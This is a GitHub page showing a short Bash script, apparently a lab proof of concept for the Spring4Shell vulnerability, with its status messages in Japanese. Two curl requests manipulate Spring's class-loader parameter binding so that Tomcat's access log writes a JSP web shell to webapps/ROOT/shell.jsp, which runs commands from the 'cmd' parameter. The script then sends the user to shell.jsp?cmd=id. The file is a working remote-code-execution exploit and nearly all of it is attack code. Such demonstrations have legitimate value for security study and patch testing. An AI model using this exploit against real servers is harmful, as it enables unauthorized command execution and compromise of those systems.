-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.bash
More file actions
32 lines (32 loc) · 2.39 KB
/
exploit.bash
File metadata and controls
32 lines (32 loc) · 2.39 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# reference: https://github.com/reznok/Spring4Shell-POC/blob/master/exploit.py
echo "----------------------------------------------------------------------------------------------------"
echo "ログの出力先をwebapps/ROOT/shell.jspに変更しています…"
echo "----------------------------------------------------------------------------------------------------"
curl -v -G \
-H "prefix:<%" \
-H "suffix:%>" \
-H "c:Runtime" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" \
"http://localhost:8080/spring4shell/hello"
sleep 5
echo "----------------------------------------------------------------------------------------------------"
echo "ログの出力先を別の場所に変えてます…"
echo "----------------------------------------------------------------------------------------------------"
curl -v -G \
-H "prefix:<%" \
-H "suffix:%>//" \
-H "c:Runtime" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=a" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.txt" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.prefix=temp" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_" \
"http://localhost:8080/spring4shell/hello"
sleep 5
echo "----------------------------------------------------------------------------------------------------"
echo "こちらにアクセスしてください: http://localhost:8080/shell.jsp?cmd=id"
echo "----------------------------------------------------------------------------------------------------"